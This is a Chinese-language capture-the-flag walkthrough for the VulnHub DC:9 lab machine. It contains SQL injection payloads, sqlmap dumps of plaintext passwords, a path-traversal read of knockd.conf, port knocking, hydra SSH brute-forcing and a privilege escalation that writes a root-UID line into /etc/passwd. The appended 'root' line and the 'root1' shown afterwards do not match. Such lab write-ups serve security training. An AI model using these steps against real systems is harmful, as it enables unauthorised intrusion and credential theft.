vulnhub-wp DC:9
🖳 主机发现
Currently scanning: Finished! | Screen View: Unique Hosts
16 Captured ARP Req/Rep packets, from 7 hosts. Total size: 960
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 28:c8:7c:19:bf:e8 10 600 zte corporation
192.168.1.5 20:1e:88:ad:fc:55 1 60 Intel Corporate
192.168.1.6 0c:d8:6c:a5:e7:a1 1 60 SHENZHEN FAST TECHNOLOGIES CO.,LTD
192.168.1.10 08:00:27:2a:5c:99 1 60 PCS Systemtechnik GmbH
192.168.1.4 c4:e1:a1:cf:47:95 1 60 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD
192.168.1.3 a2:86:90:e6:04:98 1 60 Unknown vendor
192.168.1.2 ca:71:62:08:70:8a 1 60 Unknown vendor
👁 服务扫描
nmap scan
sudo nmap -p- -oN nmap_scan 192.168.1.10 -sV -sC --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-17 15:39 CST
Nmap scan report for 192.168.1.10 (192.168.1.10)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:2A:5C:99 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
🚪🚶 获取权限
在web页面存在sql注入,可以通过联合查询
select database:-1' union select 1,2,3,4,5,database()##
, database:Staff
select tables:-1' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema=database()##
, tables:StaffDetails,Users
select columns_name in users -1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_name='Users'##
, columns in Users:UserID,Username,Password
select username and password:-1' union select 1,2,3,4,group_concat(Username),group_concat(Password) from Users##
credentials:admin:856f5de590ef37314e7c3bdf6f8a66dc
, we could crack it in https://crackstation.net/.
admin:transorbital1
我们通过手工查询到了web登录的信息,然后可以继续手工测试或者用sqlmap直接一把梭,首先查询所有数据库。
sqlmap -r sql --dbms=mysql --batch --dbs
···
[19:35:32] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
···
--batch
所有选项都选yes--dbs
爆出所有库。
既然我们已经得到了Staff库里的信息,那我们爆一下users库里的东西
sqlmap -r sql --dbms=mysql --batch -D users --dump
···
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
···
-D
指定数据库--dump
获取字段中的数据,其实就是爆表
我们可以把这些用户名和密码都存起来,后面需要密码喷洒的时候会用。接着我们去web页面登录admin看看,我们登录后,在每个页面都能发现一个"File does not exist",很可能这个页面是存在LFI漏洞的,那我们可以测试一下常用的url参数。
且经过尝试,我们找到了这个knock服务的配置文件。(从ssh服务的状态是filtered我们也可以猜测可能是有防火墙或者knock服务)
http://192.168.1.10/manage.php?file=../../../../etc/knockd.conf
那我们接下来用这个顺序去敲门,然后再通过hydra爆破ssh服务,从/etc/passwd文件中也正好看到除了root外有17个用户,恰好和users库中的对应
knock 192.168.1.10 7469 8475 9842 -v
hitting tcp 192.168.1.10:7469
hitting tcp 192.168.1.10:8475
hitting tcp 192.168.1.10:9842
然后再检查ssh服务
sudo nmap -p 22 192.168.1.10 -sV -sC
···
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
···
用hydra进行爆破
hydra -L users -P passwds 192.168.1.10 ssh -t 4 -I
···
[DATA] attacking ssh://192.168.1.10:22/
[STATUS] 92.00 tries/min, 92 tries in 00:01h, 214 to do in 00:03h, 4 active
[22][ssh] host: 192.168.1.10 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.1.10 login: joeyt password: Passw0rd
[STATUS] 94.00 tries/min, 282 tries in 00:03h, 24 to do in 00:01h, 4 active
[22][ssh] host: 192.168.1.10 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
···
在janitor账户中,我们使用linpeas.sh找到了另外的一些密码,加入进我们的密码字典,然后继续喷洒以下ssh
🛡️ 提升权限
用找到的新密码继续喷洒
hydra -L users -P passwds 192.168.1.10 ssh -t 4 -I
···
[DATA] attacking ssh://192.168.1.10:22/
[STATUS] 40.00 tries/min, 40 tries in 00:01h, 334 to do in 00:09h, 4 active
[22][ssh] host: 192.168.1.10 login: fredf password: B4-Tru3-001
[STATUS] 48.00 tries/min, 144 tries in 00:03h, 230 to do in 00:05h, 4 active
····
找到了一个新的用户凭证,登录上之后发现有sudo命令
我们查看/opt/devstuff目录下存在二进制文件的源码,简单看过之后可以发现是将read文件里的加到第二个文件中去
既然如此,那我们就可以在passwd中加一段进行提权
首先在本地生成密码hash值
mkpasswd -m sha-512 root
$6$KpgoDDyFhkOcig11$T1rC3qwEWHiTDQLJ1NUyY7W08/xowH7Wsfak6CW1iV/8m0mC2hAgQOWBNBXYNlgGeyQCbgdCeIERWt8s5QS3e0
将这一段保存进文件a中,然后使用sudo,将这一段加入/etc/passwd中
root:$6$KpgoDDyFhkOcig11$T1rC3qwEWHiTDQLJ1NUyY7W08/xowH7Wsfak6CW1iV/8m0mC2hAgQOWBNBXYNlgGeyQCbgdCeIERWt8s5QS3e0:0:0:root:/root:/bin/bash
sudo /opt/devstuff/dist/test/test a /etc/passwd
检查/etc/passwd中是否加入我们这一段
cat /etc/passwd
···
root1:$6$KpgoDDyFhkOcig11$T1rC3qwEWHiTDQLJ1NUyY7W08/xowH7Wsfak6CW1iV/8m0mC2hAgQOWBNBXYNlgGeyQCbgdCeIERWt8s5QS3e0:0:0:root:/root:/bin/bash
···
既然已经加入,那我们直接切换到root1用户
📖 推荐文章
热门相关:公子风流 神医嫁到 君归矣 王妃不乖:独宠倾城妃 抗战老兵之不死传奇